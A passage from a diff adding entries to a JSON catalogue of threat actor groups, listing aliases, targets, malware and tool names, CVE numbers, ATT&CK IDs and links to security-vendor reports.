"https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15" + ], + "attck_id": null, + "comment": "Activist" + }, + { + 
"country": "other", + "names": [ + "Shifty Jackal" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15" + ], + "attck_id": null, + "comment": "Activist" + }, + { + "country": "other", + "names": [ + "Mythic\u00c2\u00a0Leopard" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.crowdstrike.com/blog/adversary-of-the-month-for-may/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "GravityRAT" + ], + "targets": [ + "India" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.cyberscoop.com/gravityrat-cisco-talos-india-pakistan/", + "https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "SilverTerrier" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "DarkComet and NanoCore", + "Pony", + "Agent Tesla", + "KeyBase", + "ISpySoftware", + "ISR Stealer", + "Zeus and Atmos", + "Predator Pain", + "LokiBot", + "NetWire" + ], + "links": [ + "https://unit42.paloaltonetworks.com/silverterrier-covid-19-themed-business-email-compromise/", + "https://www.paloaltonetworks.com/resources/whitepapers/unit42-silverterrier-rise-of-nigerian-business-email-compromise.html" + ], + "attck_id": "G0083", + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "InvisiMole" + ], + "targets": [ + "Russia, Ukraine" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal/", + "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" + ], + "attck_id": null, + "comment": null + }, + { + 
"country": "other", + "names": [ + "T-APT-04", + "Rattlesnake", + "SideWinder " + ], + "targets": [ + "Military, Govenment, Pakistan, \"South Asian countries\"" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://research.checkpoint.com/2022/state-sponsored-attack-groups-capitalise-on-russia-ukraine-war-for-cyber-espionage/", + "http://www.deependresearch.org/2021/03/renewed-sidewinder-activity-in-south.html", + "https://www.anomali.com/blog/analyzing-digital-quartermasters-in-asia-do-chinese-and-indian-apts-have-a-shared-supply-chain", + "https://blog.trendmicro.com/trendlabs-security-intelligence/first-active-attack-exploiting-cve-2019-2215-found-on-google-play-linked-to-sidewinder-apt-group/ ", + "https://s.tencent.com/research/report/479.html", + "https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c" + ], + "attck_id": null, + "comment": "Origins believed to be traced back to 2012" + }, + { + "country": "other", + "names": [ + "Topgear", + "Blackgear", + "Comnie" + ], + "targets": [ + "Japan, Taiwan, South Korea" + ], + "operations": [], + "description": null, + "tools": [ + "Protux", + "Eliriks" + ], + "links": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/blackgear-cyberespionage-campaign-resurfaces-abuses-social-media-for-cc-communication/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/blackgear-espionage-campaign-evolves-adds-japan-target-list/" + ], + "attck_id": null, + "comment": "Dates back to 2008" + }, + { + "country": "other", + "names": [ + "Gorgon Group", + "Subaat", + "Aggah" + ], + "targets": [ + "Government organizations in the United Kingdom, Spain, Russia, the United States and MSMEs in India." 
+ ],
+ "operations": [],
+ "description": null,
+ "tools": [
+ "QuasarRAT",
+ "RevengeRat",
+ "NJRAT",
+ "NanoCoreRAT"
+ ],
+ "links": [
+ "https://medium.com/@paul.k.burbage/aggah-not-exactly-apt-5e51aaff95f5",
+ "https://yoroi.company/research/serverless-infostealer-delivered-in-est-european-countries/",
+ "https://blog.prevailion.com/2019/10/mastermana-botnet.html",
+ "https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html",
+ "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/",
+ "https://blog.yoroi.company/research/the-evolution-of-aggah-from-roma225-to-the-rg-campaign/",
+ "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
+ "https://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/",
+ "https://www.anomali.com/blog/aggah-using-compromised-websites-to-target-businesses-across-asia-including-taiwan-manufacturing-industry",
+ "https://blog.360totalsecurity.com/en/gorgon-uses-covid-19-outbreak-to-launch-cyber-attacks-on-canada-and-other-regions/",
+ "https://blog.360totalsecurity.com/en/fishing-activities-in-kenya-and-india-by-suspected-gorgon-hacking-organization/",
+ "https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/"
+ ],
+ "attck_id": null,
+ "comment": null
+ },
+ {
+ "country": "other",
+ "names": [
+ "SectorE02",
+ "Donot Team",
+ "APTC35",
+ "APT-C-35"
+ ],
+ "targets": [
+ "Government officials, Pakistan, Kashmir"
+ ],
+ "operations": [
+ "Lucky Elephant"
+ ],
+ "description": null,
+ "tools": [
+ "yty",
+ "EHDevel"
+ ],
+ "links": [
+ "https://www.reuters.com/article/us-india-cyber-threat/exclusive-india-and-pakistan-hit-by-spy-malware-cybersecurity-firm-idUSKCN1B80Y2",
+ "https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/",
+ 
"https://blogs.360.cn/post/APT-C-35_target_at_armed_forces_in_Pakistan.html", + "https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/", + "https://cybleinc.com/2021/04/21/donot-team-apt-group-is-back-to-using-old-malicious-patterns/", + "https://ti.360.net/blog/articles/pakistan-targeted-apt-campaign/", + "http://blog.ptsecurity.com/2019/11/studying-donot-team.html", + "https://ti.360.net/blog/articles/donot-group-is-targeting-pakistani-businessman-working-in-china/", + "https://asert.arbornetworks.com/donot-team-leverages-new-modular-malware-framework-south-asia/", + "https://www.netscout.com/blog/asert/lucky-elephant-campaign-masquerading", + "https://github.com/aptnotes/data/files/679036/Snake.In.The.Grass.-.Python-based.Malware.Used.For.Targeted.Attacks.-.BLUE.COAT.LABS.pdf", + "https://labs.bitdefender.com/wp-content/uploads/downloads/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit/", + "https://www.amnesty.org/en/wp-content/uploads/2021/10/AFR5747562021ENGLISH.pdf", + "https://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/" + ], + "attck_id": null, + "comment": "Possible links to Hangover" + }, + { + "country": "other", + "names": [ + "DustSquad", + "Nomadic Octopus" + ], + "targets": [ + "Central Asian users and diplomatic entities" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://securelist.com/octopus-infested-seas-of-central-asia/88200/" + ], + "attck_id": null, + "comment": "Russian-speaking" + }, + { + "country": "other", + "names": [ + "Carbanak", + "Anunak", + "Carbon Spider", + "Carbanak Group" + ], + "targets": [ + "Banks of Russia and payment system" + ], + "operations": [ + "Odinaff" + ], + "description": null, + "tools": [ + "Mimikatz", + "MBR Eraser", + "PsExec", + "Bateleur", + "SSHd with BackDoor", + "Sekur", + "Bateleur JScript Backdoor", + "Agent ORM", + "SoftPerfect Network Scanner", + "VB 
Flash", + "JS FLash", + "Ammy Admin", + "CVE-2012-2539 and CVE-2012-0158", + "Backdoor Batel", + "Cobalt Strike", + "Netscan" + ], + "links": [ + "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://www.crowdstrike.com/blog/arrests-put-new-focus-on-carbon-spider-adversary-group/", + "https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf", + "http://2014.zeronights.ru/assets/files/slides/ivanovb-zeronights.pdf" + ], + "attck_id": "G0008", + "comment": "Overlaps with FIN7" + }, + { + "country": "other", + "names": [ + "Indrik Spider", + "TA505 (merged w/Indrik Spider)", + "Evil Corp" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "WastedLocker" + ], + "links": [ + "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546", + "https://blog.fox-it.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/" + ], + "attck_id": "G0092", + "comment": null + }, + { + "country": "other", + "names": [ + "TA544" + ], + "targets": [ + "Online banking, Italy, Poland, Germany, Spain, Japan" + ], + "operations": [], + "description": null, + "tools": [ + "Panda Banker", + "Nymaim", + "Ursnif", + "Chthonic", + "Smoke Loader", + "URLZone" + ], + "links": [ + "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "Shathak", + "TA551" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Valak", + "IcedID" + ], + "links": [ + "https://unit42.paloaltonetworks.com/ta551-shathak-icedid/", + "https://www.proofpoint.com/us/blog/security-briefs/ta551-uses-sliver-red-team-tool-new-activity", + "https://redcanary.com/threat-detection-report/threats/ta551/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + 
"names": [ + "TA555" + ], + "targets": [ + "hotel employees, restaurant workers, recruiters for telecom" + ], + "operations": [], + "description": null, + "tools": [ + "", + "AdvisorsBot", + "PoshAdvisor" + ], + "links": [ + "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "APT-C-36", + "Blind Eagle" + ], + "targets": [ + "Colombian government institutions" + ], + "operations": [], + "description": null, + "tools": [ + "Imminent RAT" + ], + "links": [ + "https://lab52.io/blog/apt-c-36-new-anti-detection-tricks/", + "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", + "https://redskyalliance.org/xindustry/apt-c-36-blind-eagle-and-colombia" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "APT-C-08", + "Manling Flower (Manlinghua)", + "Bitter" + ], + "targets": [ + "Pakistan, Saudi Arabia, PRC" + ], + "operations": [], + "description": null, + "tools": [ + "BitterRAT", + "ArtraDownloader", + "SlideRAT" + ], + "links": [ + "https://meltx0r.github.io/tech/2019/09/09/bitter-apt-not-so-sweet-pt2.html", + "https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/", + "https://www.forbes.com/sites/thomasbrewster/2021/09/17/exodus-american-tech-helped-india-spy-on-china/", + "https://cert.360.cn/report/detail?id=137867e159331b7a968aa45050502d13", + "https://meltx0r.github.io/tech/2019/09/06/bitter-apt-not-so-sweet.html", + "https://labs.bitdefender.com/2020/06/bitterapt-revisited-the-untold-evolution-of-an-android-espionage-tool/", + "https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/", + "http://blogs.360.cn/post/analysis_of_APT_C_08.html", + 
"https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/", + "https://www.anomali.com/blog/suspected-bitter-apt-continues-targeting-government-of-china-and-chinese-organizations#When:19:24:00Z" + ], + "attck_id": null, + "comment": "ArtraDownloader: earliest timestamp Feb 2015" + }, + { + "country": "other", + "names": [ + "WINDSHIFT", + "Bahamut", + "EHDEVEL", + "URPAGE", + "The White Company" + ], + "targets": [ + "Middle Eastern human rights activists" + ], + "operations": [ + "InPage zero-day", + "Malicious MDM" + ], + "description": null, + "tools": [], + "links": [ + "https://blog.cyble.com/2021/08/10/bahamut-threat-group-targeting-users-through-phishing-campaign/", + "https://blog.talosintelligence.com/2018/07/Mobile-Malware-Campaign-uses-Malicious-MDM-Part2.html", + "https://blogs.blackberry.com/en/2020/10/blackberry-uncovers-massive-hack-for-hire-group-targeting-governments-businesses-human-rights-groups-and-influential-individuals", + "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/", + "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", + "https://blog.talosintelligence.com/2018/07/Mobile-Malware-Campaign-uses-Malicious-MDM.html", + "https://www.anomali.com/blog/bahamut-possibly-responsible-for-multi-stage-infection-chain-campaign", + "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/" + ], + "attck_id": "G0112", + "comment": "Possibly linked to WindShift, Patchwork, Dropping Elephant, possibly commercial/mercenary" + }, + { + "country": "other", + "names": [ + "WindShift" + ], + "targets": [ + "Gulf Cooperation Council" + ], + "operations": [], + 
"description": null, + "tools": [ + "WindTape", + "WindTail" + ], + "links": [ + "https://gsec.hitb.org/materials/sg2018/D1%20COMMSEC%20-%20In%20the%20Trails%20of%20WINDSHIFT%20APT%20-%20Taha%20Karim.pdf", + "https://objective-see.com/blog/blog_0x38.html", + "https://digitasecurity.com/blog/2018/12/20/windtail/", + "https://unit42.paloaltonetworks.com/shifting-in-the-wind-windshift-attacks-target-middle-eastern-governments/" + ], + "attck_id": "G0112", + "comment": "Possibly linked to Bahamut, Patchwork, Dropping Elephant" + }, + { + "country": "other", + "names": [ + "EmpireMonkey", + "CobaltGoblin" + ], + "targets": [], + "operations": [ + "Bank of Valletta" + ], + "description": null, + "tools": [], + "links": [ + "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/", + "https://www.timesofmalta.com/articles/view/20190225/local/how-bov-hackers-got-away-with-13-million.702800", + "http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems" + ], + "attck_id": null, + "comment": "Criminal, overlap with FIN7 & Carbanak" + }, + { + "country": "other", + "names": [ + "Pacha Group" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.intezer.com/blog-pacha-group-deploying-undetected-cryptojacking-campaigns/", + "https://www.intezer.com/blog-technical-analysis-pacha-group/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "DNSpionage" + ], + "targets": [ + "Lebanon, UAE" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://blog-cert.opmd.fr/dnspionage-retour-factuel-sur-les-attaques-annoncees-dans-differents-medias/", + "https://blog-cert.opmd.fr/dnspionage-weird-apt32-stuff/", + "https://twitter.com/_CPResearch_/status/1103525899515973632", + "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html", + 
"https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "DeadlyKiss", + "PLATINUM", + "TwoForOne" + ], + "targets": [ + "primarily targets governmental organizations, defense institutes, intelligence agencies, and telecommunication providers in South and Southeast Asia" + ], + "operations": [ + "Hellsing" + ], + "description": null, + "tools": [ + "Hotpatching techniques", + "AMT Feature FW evasion", + "CVE-2015-2545" + ], + "links": [ + "http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf", + "https://blog.telsy.com/deadlykiss-malware/", + "https://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/", + "https://www.microsoft.com/security/blog/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/?source=mmpc", + "http://arstechnica.com/security/2015/04/elite-cyber-crime-group-strikes-back-after-attack-by-rival-apt-gang/", + "https://threatpost.com/platinum-apt-first-to-abuse-intel-chip-management-feature/126166/", + "https://securelist.com/titanium-the-platinum-group-strikes-again/", + "https://securelist.com/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/", + "https://blogs.technet.microsoft.com/mmpc/2016/04/26/digging-deep-for-platinum/" + ], + "attck_id": "G0068", + "comment": null + }, + { + "country": "other", + "names": [ + "GreyEnergy Group" + ], + "targets": [ + "Industries: Energy (in Ukraine & Eastern Europe)" + ], + "operations": [], + "description": null, + "tools": [ + "GreyEnergy Dropper", + "Maldoc", + "GreyEnergy Min/FELIXROOT" + ], + "links": [ + "https://github.com/NozomiNetworks/greyenergy-unpacker", + "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf", + 
"https://www.nozominetworks.com/resources/research-paper/greyenergy-dissecting-the-malware-from-maldoc-to-backdoor-2/", + "https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "TA516", + "SmokingDro" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Remocs" + ], + "links": [], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "Captain Cha", + "TA564" + ], + "targets": [ + "Delivered Nymaim to Poland and Danabot to Canada" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www2.gov.bc.ca/assets/gov/british-columbians-our-governments/services-policies-for-government/information-management-technology/information-security/global_threat_landscape_-_bc_security_day.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "TA543", + "Sagrid" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www2.gov.bc.ca/assets/gov/british-columbians-our-governments/services-policies-for-government/information-management-technology/information-security/global_threat_landscape_-_bc_security_day.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "TA545", + "AirCanada" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www2.gov.bc.ca/assets/gov/british-columbians-our-governments/services-policies-for-government/information-management-technology/information-security/global_threat_landscape_-_bc_security_day.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "TA2101" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Maze ransomware" + ], + "links": [ + 
"https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us", + "https://www.cyfirma.com/maze-ransomware-group-declared-successful-exploits-of-many-organizations-and-released-massive-data-on-public-site-in-one-day/", + "https://securityintelligence.com/news/ta2101-threat-actor-targeted-german-italian-and-us-organizations-with-maze-ransomware/" + ], + "attck_id": null, + "comment": "Criminal, Cyfirma asserts link to APT29" + }, + { + "country": "other", + "names": [ + "Evilnum", + "Decepticons" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.brighttalk.com/webcast/15591/424426/new-threats-in-a-changing-world-apt-trends-in-q2-2020", + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", + "https://www.rewterz.com/rewterz-news/rewterz-threat-alert-evilnum-apt-group-targeting-financial-sector-2", + "https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html", + "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Golden Chickens" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://quointelligence.eu/2018/11/golden-chickens-uncovering-a-malware-as-a-service-maas-provider-and-two-new-threat-actors-using/", + "https://quointelligence.eu/2020/01/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors/" + ], + "attck_id": null, + "comment": "Malware-as-a-service" + }, + { + "country": "other", + "names": [ + "IamtheKing", + "Powerpool" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "SLOTHFULMEDIA" + ], + "links": [ + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a", + "https://twitter.com/craiu/status/1311920398259367942" + ], + "attck_id": null, + 
"comment": "active since 2017" + }, + { + "country": "other", + "names": [ + "UNC1945", + "LightBasin" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Pupyrat", + "Oksolo", + "QEMU", + "PingPong", + "Slapstick", + "Steelcorgi", + "Evilsun", + "Tinyshell", + "Logbleach", + "Openshackle", + "Lemonstick" + ], + "links": [ + "https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html", + "https://www.crowdstrike.com/blog/an-analysis-of-lightbasin-telecommunications-attacks/", + "https://www.fireeye.com/blog/threat-research/2020/11/critical-buffer-overflow-vulnerability-in-solaris-can-allow-remote-takeover.html", + "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "APT-C-44", + "Fox Group" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://blogs.360.cn/post/APT-C-44.html" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "Luder", + "Karba", + "Tapaoux", + "DarkHotel", + "Nemim", + "APT-C-06, SHADOW CRANE, T-APT-02, SIG25 (NSA),", + "Tardigrade Spider", + "Dubnium (Microsoft)" + ], + "targets": [ + "Japan, Taiwan, China, Russia, South Korea, North Korea Government, Utilities, High-Tech, Automotive" + ], + "operations": [ + "Daybreak?", + "WizardOpium", + "Fallout Team" + ], + "description": null, + "tools": [ + "Higaisa", + "Win32.Pioneer", + "CVE-2012-0158", + "CVE-2010-2883", + "Asruex", + "CVE-2015-8651", + "CVE-2016-4171 and CVE-2018-817", + "Win32.Karba", + "Inexsmar" + ], + "links": [ + "https://translate.google.com/translate?hl=&sl=zh-CN&tl=en&u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%2FW87E6_v9YCnsmQWDd7NOHw&sandbox=1", + "http://www.wired.com/2014/11/darkhotel-malware/", + "https://www.zscaler.com/blogs/research/return-higaisa-apt", + 
"https://github.com/aptnotes/data/issues/56", + "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/suspected-darkhotel-apt-activity-update.html", + "https://securelist.com/operation-daybreak/75100/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/asruex-backdoor-variant-infects-word-documents-and-pdfs-through-old-ms-office-and-adobe-vulnerabilities/", + "https://s.tencent.com/research/report/836.html", + "https://blog.malwarebytes.com/threat-analysis/2020/06/higaisa/", + "https://labs.bitdefender.com/wp-content/uploads/downloads/inexsmar-an-unusual-darkhotel-campaign/", + "https://www.cfr.org/blog/questioning-chinas-politicization-cyber-intelligence-during-pandemic", + "https://blogs.jpcert.or.jp/en/2016/06/asruex-malware-infecting-through-shortcut-files.html", + "https://blog.prevailion.com/2020/06/the-gh0st-remains-same8.html", + "http://drops.wooyun.org/tips/11726", + "https://securelist.com/blog/research/66779/the-darkhotel-apt/", + "https://s.tencent.com/research/report/1000.html", + "https://research.checkpoint.com/silivaccine-a-look-inside-north-koreas-anti-virus/", + "https://www.anomali.com/blog/covid-19-themes-are-being-utilized-by-threat-actors-of-varying-sophistication", + "https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/" + ], + "attck_id": "G0012", + "comment": null + }, + { + "country": "other", + "names": [ + "Ghostwriter", + "UNC1151" + ], + "targets": [], + "operations": [ + "Operation Ghostwriter" + ], + "description": null, + "tools": [], + "links": [ + "https://www.prevailion.com/diving-deep-into-unc1151s-infrastructure-ghostwriter-and-beyond/", + "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/unc1151-ghostwriter-update-report.pdf", + "https://cert.gov.ua/article/37626", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0318.pdf", + 
"https://blog.google/threat-analysis-group/update-threat-landscape-ukraine/", + "https://www.mandiant.com/resources/unc1151-linked-to-belarus-government" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "Crouching Yeti" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://securelist.com/blog/research/65240/energetic-bear-more-like-a-crouching-yeti/" + ], + "attck_id": null, + "comment": "Links to Energetic Bear" + }, + { + "country": "unknown", + "names": [ + "NewRomanic Cyber Army Team " + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Whois Wiper" + ], + "links": [ + "http://www.mcafee.com/us/resources/white-papers/wp-dissecting-operation-troy.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "The Whois Hacking Team" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://www.mcafee.com/us/resources/white-papers/wp-dissecting-operation-troy.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "ItaDuke" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "Roaming Tiger" + ], + "targets": [ + "Gov, Oil and Gas, Aerospace, Defense in UZ, MN, MY, RU, BY, KZ, US, Tibet, UA" + ], + "operations": [ + "TOPNEWS", + "Roaming Tiger" + ], + "description": null, + "tools": [ + "SOGU", + "FIRSTBLOOD", + "PI", + "GHOST", + "TEMPFUN" + ], + "links": [ + "http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/", + "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "Emdivi", + "Cloudy Omega", + "Blue Termite" + ], + 
"targets": [ + "This threat actor is believed to have been responsible for the Japan Pension Service incident. It is also known as Emdivi\u00c2\u00a0and Cloudy Omega." + ], + "operations": [ + "Blue Termite" + ], + "description": null, + "tools": [ + "Emdivi" + ], + "links": [ + "http://www.kaspersky.com/about/news/virus/2015/Blue-Termite-A-Sophisticated-Cyber-Espionage-Campaign-is-After-High-Profile-Japanese-Targets", + "http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/", + "http://www.symantec.com/connect/blogs/operation-cloudyomega-ichitaro-zero-day-and-ongoing-cyberespionage-campaign-targeting-japan", + "https://web.archive.org/web/20160303010953/http://www.kaspersky.com/about/news/virus/2015/Blue-Termite-A-Sophisticated-Cyber-Espionage-Campaign-is-After-High-Profile-Japanese-Targets" + ], + "attck_id": null, + "comment": "Possible link to APT10" + }, + { + "country": "unknown", + "names": [ + "Suckfly" + ], + "targets": [ + "South Korea, India" + ], + "operations": [], + "description": null, + "tools": [ + "tcpscan", + "wce", + "credentialdumper", + "gsecdump", + "smbscan" + ], + "links": [ + "http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates", + "http://www.symantec.com/connect/blogs/indian-organizations-targeted-suckfly-attacks" + ], + "attck_id": null, + "comment": "Alleged to be China based" + }, + { + "country": "unknown", + "names": [ + "?" 
+ ], + "targets": [], + "operations": [ + "Groundbait" + ], + "description": null, + "tools": [ + "Win32/Prikormka" + ], + "links": [ + "http://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "SPIVY" + ], + "targets": [ + "Organisations in Hong Kong" + ], + "operations": [], + "description": null, + "tools": [ + "PoisonIvy", + "CVE-2015-2545" + ], + "links": [ + "http://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "EvilPost" + ], + "targets": [ + "Japanese Defence Sector" + ], + "operations": [], + "description": null, + "tools": [ + "CVE-2015-2545 " + ], + "links": [ + "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html" + ], + "attck_id": null, + "comment": "C2 Server in Japan" + }, + { + "country": "unknown", + "names": [ + "Danti" + ], + "targets": [ + "Kazakhstan, Kyrgyzstan, Uzbekistan, Myanmar, Nepal and the Philippines" + ], + "operations": [], + "description": null, + "tools": [ + "CVE-2015-2545 " + ], + "links": [ + "https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/" + ], + "attck_id": null, + "comment": "probably related to NetTraveller and DragonOK" + }, + { + "country": "unknown", + "names": [ + "?" 
+ ], + "targets": [ + "Industrial Control Systems (ICS)" + ], + "operations": [ + "IronGate" + ], + "description": null, + "tools": [], + "links": [ + "https://www.fireeye.com/blog/threat-research/2016/06/irongate_ics_malware.html" + ], + "attck_id": null, + "comment": "MitM, Sandbox Evasion" + }, + { + "country": "unknown", + "names": [ + "Evanescent Bat" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [], + "attck_id": null, + "comment": "Tracked by Crowdstrike" + }, + { + "country": "unknown", + "names": [ + "NewsBeef" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://securelist.com/blog/software/74503/freezer-paper-around-free-meat/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "unknown", + "names": [ + "Poseidon" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://securelist.com/blog/research/73673/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/" + ], + "attck_id": 